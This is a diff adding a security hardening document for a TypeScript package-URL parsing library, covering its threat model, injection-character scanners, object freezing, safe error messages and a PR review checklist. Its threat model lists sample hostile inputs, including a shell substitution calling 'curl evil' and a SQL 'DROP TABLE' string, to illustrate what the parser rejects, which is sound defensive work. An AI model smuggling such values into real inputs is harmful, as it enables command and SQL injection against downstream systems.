|
| 1 | +# Hardening |
| 2 | + |
| 3 | +How this library treats PURL strings as hostile input and refuses to |
| 4 | +hand downstream consumers something that can hurt them. Read this |
| 5 | +if you are touching `src/strings.ts`, `src/objects.ts`, `src/error.ts`, |
| 6 | +or reviewing a PR that adds a new ecosystem handler. |
| 7 | + |
| 8 | +## Who this is for |
| 9 | + |
| 10 | +Contributors adding or reviewing code paths that read PURL input |
| 11 | +from the outside (user text, CLI args, API payloads, file contents). |
| 12 | +The rules here keep the library from being a confused deputy for a |
| 13 | +caller with hostile intent. |
| 14 | + |
| 15 | +## The stance |
| 16 | + |
| 17 | +**Valid PURLs never throw. Hostile input never parses.** |
| 18 | + |
| 19 | +That is the whole doctrine. Everything below is mechanics that turn |
| 20 | +it into code. |
| 21 | + |
| 22 | +A well-formed PURL (passes spec shape + no dangerous characters) |
| 23 | +builds a frozen `PackageURL` instance the caller can rely on. An |
| 24 | +ill-formed PURL throws a `PurlError`. An input that looks like it |
| 25 | +wants to be interpreted twice — once as a PURL, and again by a |
| 26 | +downstream consumer (shell, SQL, URL, log pipeline) — throws a |
| 27 | +`PurlInjectionError` **before parse**. The caller never sees a |
| 28 | +half-interpreted object. |
| 29 | + |
| 30 | +## The threat model |
| 31 | + |
| 32 | +We assume the attacker controls the PURL string. They may try to: |
| 33 | + |
| 34 | +1. **Inject shell metacharacters** so a downstream caller that |
| 35 | + interpolates the PURL into a command executes something the |
| 36 | + caller didn't intend. Example: |
| 37 | + `pkg:npm/$(curl evil)/x@1`. |
| 38 | +2. **Break out of a quoted context** so the PURL becomes argv |
| 39 | + splitting fodder or SQL quote-escape. Example: |
| 40 | + `pkg:npm/a";DROP TABLE pkgs;--/x@1`. |
| 41 | +3. **Desync terminal / log parsers** with control characters, so a |
| 42 | + log-review tool renders attacker-controlled bytes as if they |
| 43 | + were tool output. Example: `pkg:npm/a\x1b[2Jb/x@1`. |
| 44 | +4. **Smuggle invisible characters** (zero-width spaces, RLO |
| 45 | + overrides, BOM) so the rendered name looks like one package but |
| 46 | + resolves to another. Example: `pkg:npm/reactact@1`. |
| 47 | +5. **Truncate** with NUL, so a PURL that looks harmless to a JS |
| 48 | + string parser gets half-read by a C library. Example: |
| 49 | + `pkg:npm/safe\x00evil@1`. |
| 50 | +6. **Mutate a PackageURL** after it has been built, so a consumer |
| 51 | + downstream sees a different name than the one that was validated |
| 52 | + upstream. |
| 53 | + |
| 54 | +This doc is how the library refuses all six. |
| 55 | + |
| 56 | +## The first line: injection-character detection |
| 57 | + |
| 58 | +`src/strings.ts` exports `isInjectionCharCode(code: number)`. It |
| 59 | +returns `true` for any character code in one of four classes: |
| 60 | + |
| 61 | +| Class | Codes | Why | |
| 62 | +|---|---|---| |
| 63 | +| **C0 control characters** | `0x00`–`0x1f` | NUL (truncation), TAB / LF / CR (log injection), ESC (terminal escape), everything else in that range | |
| 64 | +| **Shell metacharacters + brackets + quotes** | `0x20` (space), `!`, `"`, `#`, `$`, `%`, `&`, `'`, `(`, `)`, `*`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]`, `` ` ``, `{`, `|`, `}`, `~`, DEL | Shell interpretation, SQL quote-escape, URL-fragment injection | |
| 65 | +| **C1 control characters** | `0x80`–`0x9f` | Legacy control bytes; some terminals still act on them | |
| 66 | +| **Unicode invisible/directional** | `U+200B`–`U+200F`, `U+202A`–`U+202E`, `U+2060`, `U+FEFF`, `U+FFFC`, `U+FFFD` | Zero-width chars, bidi override characters (IDN-homograph attacks), BOM, object replacement | |
| 67 | + |
| 68 | +Any input containing one of these characters in a component where |
| 69 | +we scan for injection throws `PurlInjectionError` before the |
| 70 | +standard parse logic runs. The error names: |
| 71 | + |
| 72 | +- Which **purl type** the component belongs to (`npm`, `maven`, …) |
| 73 | +- Which **component** failed (`name`, `namespace`, …) |
| 74 | +- The **char code** and a human-readable label |
| 75 | + |
| 76 | +```typescript |
| 77 | +class PurlInjectionError extends PurlError { |
| 78 | + readonly charCode: number |
| 79 | + readonly component: string |
| 80 | + readonly purlType: string |
| 81 | +} |
| 82 | +``` |
| 83 | + |
| 84 | +Callers who want to treat injection attempts as auditable events |
| 85 | +(log, alert, rate-limit the source) can `catch` specifically for |
| 86 | +`PurlInjectionError` and route those up while still handling |
| 87 | +`PurlError` as "just a malformed PURL." |
| 88 | + |
| 89 | +## The narrower scanner for freer contexts |
| 90 | + |
| 91 | +Some PURL components (like version strings or URL-based qualifier |
| 92 | +values) are legitimately allowed to carry characters that are |
| 93 | +dangerous elsewhere — a URL qualifier value may contain `?`, `&`, |
| 94 | +`=`, `:`, `/` as part of a normal URL. For those contexts |
| 95 | +`src/strings.ts` exports a narrower scanner that only blocks the |
| 96 | +characters that actually enable shell execution or code injection: |
| 97 | +the control characters, the shell metacharacters (`|`, `&`, `;`, |
| 98 | +`` ` ``, `$`, `<`, `>`, `(`, `)`, `{`, `}`, `\`), and quotes. |
| 99 | + |
| 100 | +The choice between the broad and narrow scanner is the difference |
| 101 | +between "this component should be a plain identifier" (use the |
| 102 | +broad scanner; anything non-identifier is suspicious) and "this |
| 103 | +component is a URL-shaped value" (use the narrow scanner; pass |
| 104 | +through URL syntax). |
| 105 | + |
| 106 | +## The second line: immutable instances |
| 107 | + |
| 108 | +`src/objects.ts` exports `recursiveFreeze(value)`. Every |
| 109 | +`PackageURL` instance runs through it at construction time: |
| 110 | + |
| 111 | +- Top-level instance is `Object.freeze`-d. |
| 112 | +- Qualifiers object is frozen. |
| 113 | +- Any nested objects or arrays reachable from the instance are |
| 114 | + frozen. |
| 115 | + |
| 116 | +That means a `PackageURL` you receive from a library call cannot be |
| 117 | +mutated by a later code path: |
| 118 | + |
| 119 | +```typescript |
| 120 | +const purl = new PackageURL('npm', undefined, 'safe-pkg', '1.0.0') |
| 121 | +purl.name = 'evil-pkg' // silently ignored (strict mode: throws) |
| 122 | +purl.qualifiers.key = 'hax' // silently ignored (strict mode: throws) |
| 123 | +``` |
| 124 | + |
| 125 | +This matters when a validated PURL is passed through 3+ hops — a |
| 126 | +middle hop can't secretly modify the object and hand it to the next |
| 127 | +hop. Validation up front + freeze means "validated" still means |
| 128 | +something at the endpoint. |
| 129 | + |
| 130 | +The freeze walk is **breadth-first** with a `WeakSet` for cycle |
| 131 | +detection and a hard ceiling at one million nodes |
| 132 | +(`LOOP_SENTINEL`). An adversary-constructed cyclic object cannot |
| 133 | +loop the walker forever; a million-node object graph throws |
| 134 | +`Error("Object graph too large…")` rather than OOM-ing the |
| 135 | +process. |
| 136 | + |
| 137 | +## The third line: error messages that don't leak |
| 138 | + |
| 139 | +`src/error.ts`'s `formatPurlErrorMessage` normalizes every |
| 140 | +user-visible error message: |
| 141 | + |
| 142 | +- Lowercase the first letter (`Invalid → invalid`) |
| 143 | +- Strip a trailing period |
| 144 | +- Prefix with `Invalid purl:` |
| 145 | + |
| 146 | +The normalization matters because error strings land in logs, |
| 147 | +support tickets, and sometimes in HTTP responses. A consistent |
| 148 | +shape: |
| 149 | + |
| 150 | +- Is grep-able (every one starts with `Invalid purl:`). |
| 151 | +- Never renders attacker-controlled bytes verbatim when injection is |
| 152 | + detected — the `PurlInjectionError` message says *the char label* |
| 153 | + (e.g. "SPACE", "NUL", "BACKTICK"), not the raw character, so a |
| 154 | + terminal that pipes the log never interprets an ESC sequence the |
| 155 | + attacker embedded. |
| 156 | + |
| 157 | +## When to call what |
| 158 | + |
| 159 | +| Situation | Use | |
| 160 | +|---|---| |
| 161 | +| Parsing a full PURL string from untrusted input | `new PackageURL(str)` — catches `PurlInjectionError` + `PurlError` | |
| 162 | +| Validating a user-submitted PURL in a form | `PackageURL.fromStringResult(str)` — returns `Result`, collect failures | |
| 163 | +| Building a PURL from already-trusted pieces (internal codepaths) | `new PackageURL(type, ns, name, version, qualifiers, subpath)` — still runs validation but you know the inputs are clean | |
| 164 | +| Comparing two PURLs | `purl.equals(other)` / `purl.matches(pattern)` — both ReDoS-safe | |
| 165 | + |
| 166 | +For converter utilities (URL → PURL, PURL → URL) see |
| 167 | +`docs/converters.md`; for the builder API see `docs/builders.md`. |
| 168 | + |
| 169 | +## Red flags when reviewing a PR |
| 170 | + |
| 171 | +If a PR touches PURL-component handling, pause if you see any of: |
| 172 | + |
| 173 | +1. **Bypassing the injection scan.** A rule like "skip |
| 174 | + `isInjectionCharCode` for this type because the user won't ever |
| 175 | + put weird characters there" is exactly the kind of assumption |
| 176 | + that gets a library blamed for the next CVE. If the scan is |
| 177 | + expensive in a hot path, optimize the scan — never skip it. |
| 178 | +2. **Unfreezing.** No `Object.freeze(purl, { writable: true })`. |
| 179 | + No cloning into a mutable shape unless it is a new instance |
| 180 | + being built from scratch. If you see code that hands back a |
| 181 | + mutable copy, call it out. |
| 182 | +3. **Raw char interpolation in error messages.** Every |
| 183 | + `PurlInjectionError` is built from `charLabel`, not the raw |
| 184 | + character. If a new error message string-interpolates a |
| 185 | + suspect char directly, that message will render the char |
| 186 | + verbatim in someone's terminal later. |
| 187 | +4. **Removing the `LOOP_SENTINEL` cap** on `recursiveFreeze` or |
| 188 | + bumping it to `Infinity`. The ceiling is the last line between a |
| 189 | + hostile cyclic object and process-wide OOM. |
| 190 | +5. **Catching and swallowing `PurlInjectionError` silently.** |
| 191 | + Injection attempts are a signal, not noise. They deserve to |
| 192 | + propagate to the caller who can choose to log/alert/block. |
| 193 | +6. **New ecosystem handler that doesn't use `PurlComponent`'s |
| 194 | + shared normalize/validate.** Every ecosystem inherits the |
| 195 | + injection scan via the shared components. An ad-hoc parser |
| 196 | + inside `src/purl-types/<x>.ts` bypasses that by default. |
| 197 | + |
| 198 | +## What this library does **not** defend against |
| 199 | + |
| 200 | +Be honest about scope: |
| 201 | + |
| 202 | +- **Resource exhaustion.** A very long valid PURL will still be |
| 203 | + processed. We do not impose a max string length. Callers who |
| 204 | + accept PURLs from the wire should rate-limit and size-limit at |
| 205 | + the boundary. |
| 206 | +- **Regex catastrophic backtracking in patterns you pass to us.** |
| 207 | + The library's own internal regexes are ReDoS-free (simple char |
| 208 | + scans), but if you pass a user-controlled pattern to |
| 209 | + `purl.matches(userPattern)`, validate that pattern yourself. |
| 210 | +- **Typosquatting / ecosystem-level package confusion.** That is a |
| 211 | + policy problem at the package-registry layer (Socket's main |
| 212 | + product, in fact) — not a string-level check this library can |
| 213 | + make. |
| 214 | +- **Crafted URLs in URL-converter inputs.** `urlConverter.fromUrl` |
| 215 | + trusts its input is a real URL string. Pass untrusted URLs |
| 216 | + through `new URL()` first. |
| 217 | + |
| 218 | +If the caller's use case hits one of these, document it at the |
| 219 | +boundary; don't try to push it into the library. |
| 220 | + |
| 221 | +## Checklist for adding a new ecosystem handler |
| 222 | + |
| 223 | +- [ ] Handler file at `src/purl-types/<name>.ts`. |
| 224 | +- [ ] `normalize`, `validate` rules use the shared `PurlComponent` |
| 225 | + helpers — no ad-hoc parsing. |
| 226 | +- [ ] Any custom check calls `isInjectionCharCode` (or the narrower |
| 227 | + command-execution scanner) before other logic. |
| 228 | +- [ ] Tests include at least one case per injection class (shell |
| 229 | + char, control char, unicode invisible) — expect |
| 230 | + `PurlInjectionError`. |
| 231 | +- [ ] No mutation of the PURL instance after construction. |
| 232 | +- [ ] No catch-and-swallow of `PurlInjectionError`. |
| 233 | +- [ ] Error messages use `charLabel`, never raw chars. |
| 234 | +- [ ] Registered in `src/purl-type.ts`'s `knownTypes` map. |
| 235 | +- [ ] `pnpm test` green, `pnpm cover` still at 100%. |
| 236 | + |
| 237 | +## Further reading |
| 238 | + |
| 239 | +- [`docs/architecture.md`](./architecture.md) — where these modules |
| 240 | + fit in the larger design. |
| 241 | +- [`docs/api.md`](./api.md) — the full public API reference. |
| 242 | +- [`docs/vers.md`](./vers.md) — version-range specifiers; also |
| 243 | + hostile-input territory. |
| 244 | +- [`src/strings.ts`](../src/strings.ts) — `isInjectionCharCode` + |
| 245 | + narrower scanners. |
| 246 | +- [`src/objects.ts`](../src/objects.ts) — `recursiveFreeze` + |
| 247 | + `LOOP_SENTINEL`. |
| 248 | +- [`src/error.ts`](../src/error.ts) — `PurlError` + |
| 249 | + `PurlInjectionError` + `formatPurlErrorMessage`. |
| 250 | +- [package-url/purl-spec](https://github.com/package-url/purl-spec) — |
| 251 | + the upstream spec this library implements. |
0 commit comments